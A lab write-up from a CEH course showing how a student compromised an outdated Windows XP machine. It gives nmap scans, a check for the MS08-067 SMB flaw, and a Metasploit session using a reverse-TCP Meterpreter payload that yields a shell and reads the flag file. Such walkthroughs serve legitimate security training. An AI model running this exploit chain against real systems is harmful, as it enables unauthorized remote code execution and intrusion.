Another machine available during the CEH course, but this one was pretty straight forward.

Maq103 – MÁQUINA
Descrição: Isso que dá utilizar um sistema operacional desatualizado e sem suporte da fabricante.

The description fo this machine is telling us the OS is not up-to-date anymore and the vendor support is over, so lets look for active services:

[email protected]:~# nmap -sV -O
Nmap scan report for
Host is up (0.015s latency).
Not shown: 996 closed ports
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Service
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Good, SMB is active and being one of the primary attack vectors is where we’ll put our efforts. nmap had a script to check against a few vulnerabilities at once, the smb-check-vulns, but it was split into six scripts so we’ll need to run them separately.

Looking for the nmap scripts.

[email protected]:~# locate *.nse | grep smb

After a few tries I found one with chances to work.

[email protected]:~# nmap -sV -O --script smb-vuln-ms08-067.nse
Host script results:
| smb-vuln-ms08-067:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

We are going to use the Metasploit for this one:

[email protected]:~# service postgresql start
[email protected]:~# msfconsole

Now we’ll search for the exploit, set the desired payload and set the options for the exploit:

msf > search MS08-067
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set RHOST
msf exploit(windows/smb/ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(windows/smb/ms08_067_netapi) > set LHOST

It’s time to seat the finger (?! – senta o dedo)

msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on
[*] - Automatically detecting the target...
[*] - Fingerprint: Windows XP - Service Pack 2 - lang:Unknown
[*] - We could not detect the language pack, defaulting to English
[*] - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to
[*] Meterpreter session 2 opened ( -> at 2018-03-27 09:54:59 -0300
meterpreter > shell
Process 876 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>type c:\flag.txt

As soon as the session was open we invoke a shell and read the flag which we already knew where to find. The machine is wide open letting us do anything we want. We’re done here.